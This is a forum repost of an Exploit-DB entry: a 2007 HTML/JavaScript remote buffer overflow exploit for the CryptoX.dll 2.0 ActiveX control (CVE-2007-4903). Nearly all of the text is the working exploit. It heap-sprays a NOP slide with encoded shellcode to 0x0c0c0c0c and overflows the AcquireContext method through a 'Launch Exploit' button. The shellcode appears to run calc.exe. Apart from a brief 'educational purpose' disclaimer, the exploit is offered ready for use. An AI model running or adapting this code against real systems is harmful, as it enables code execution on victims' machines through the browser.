Exploit Ultra Crypto Component - 'CryptoX.dll 2.0' Remote Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4389
Проверка EDB
  1. Пройдено
Автор
SHINNAI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2007-4903
Дата публикации
2007-09-10
HTML:
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------------
 <b>Ultra Crypto Component (CryptoX.dll <= 2.0) "AcquireContext()" Remote BoF Exploit</b>
 url: http://www.ultrashareware.com/

 author: shinnai
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 
 This was written for educational purpose. Use it at your own risk.
 Author will be not responsible for any damage.
 
 Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
 all software that use this ocx are vulnerable to this exploits.

 Heap Spray Technique was developed by SkyLined
 (http://www.edup.tudelft.nl/~bjwever/advisory_iframe.html.php)

 <b>The "DeleteContext()" is vulnerable too</b>
-----------------------------------------------------------------------------------
<object id=boom classid="clsid:09C282FE-7DE7-4697-9BE2-1C4F4DA825B3" style="WIDTH: 578px; HEIGHT: 228px"></object>
<input language=JavaScript onclick=tryMe() type=button value="Launch Exploit">
<script>
 var shellcode = unescape( "%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" +
                           "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" +
                           "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" +
                           "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" +
                           "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" +
                           "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" +
                           "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" +
                           "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" +
                           "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" +
                           "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" +
                           "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" +
                           "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" +
                           "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" +
                           "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" +
                           "%u652E%u6578%u9000");

 var spraySlide = unescape("%u9090%u9090");
 var heapSprayToAddress = 0x0c0c0c0c;

  function tryMe()
   {
    var size_buff = 3200;
    var x =  unescape("%0c%0c%0c%0c");
    while (x.length<size_buff) x += x;
    x = x.substring(0,size_buff);

    boom.AcquireContext(x,1,1);
   }
    
  function getSpraySlide(spraySlide, spraySlideSize)
   {
    while (spraySlide.length*2<spraySlideSize)
     {
      spraySlide += spraySlide;
     }
    spraySlide = spraySlide.substring(0,spraySlideSize/2);
    return (spraySlide);
   }

 var heapBlockSize = 0x100000;
 var SizeOfHeapDataMoreover = 0x5;
 var payLoadSize = (shellcode.length * 2);

 var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);
 var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;

 var memory = new Array();
 spraySlide = getSpraySlide(spraySlide,spraySlideSize);

 for (i=0;i<heapBlocks;i++)
  {
    memory[i] = spraySlide +  shellcode;
  }
</script>
</span></span>
</code></pre>

# milw0rm.com [2007-09-10]
 
Источник
www.exploit-db.com

Похожие темы